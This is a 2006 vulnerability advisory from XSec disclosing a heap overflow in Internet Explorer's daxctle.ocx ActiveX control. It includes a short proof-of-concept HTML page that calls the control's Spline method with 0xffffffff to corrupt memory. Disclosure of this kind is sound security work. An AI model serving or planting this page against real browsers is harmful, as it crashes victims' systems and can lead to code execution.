Advisory Text :  

Advisory ID:
XSec-06-10

Advisory Name:
Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability

Release Date:
08/28/2006

Tested on:
Windows 2000/XP/2003 Internet Explorer 6.0 SP1

Affected version:
Windows 2000
Windows XP
Windows 2003

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
When Internet Explorer handle DirectAnimation.PathControl COM
object(daxctle.ocx) Spline method, Set the first parameter to 0xffffffff
will triggers an
invalid memory write, That an attacker may DoS and possibly could
execute arbitrary code.

Exploit:
=============== daxctle.htm start ================

<!--
// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:WINNTsystem32daxctle.ocx

--!>
<html>
<head>
<title>test</title>
</head>
<body>
<script>

var target = new ActiveXObject("DirectAnimation.PathControl");

target.Spline(0xffffffff, 1);

</script>
</body>
</html>

=============== daxctle.htm end ==================

Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19

About XSec:
We are redhat.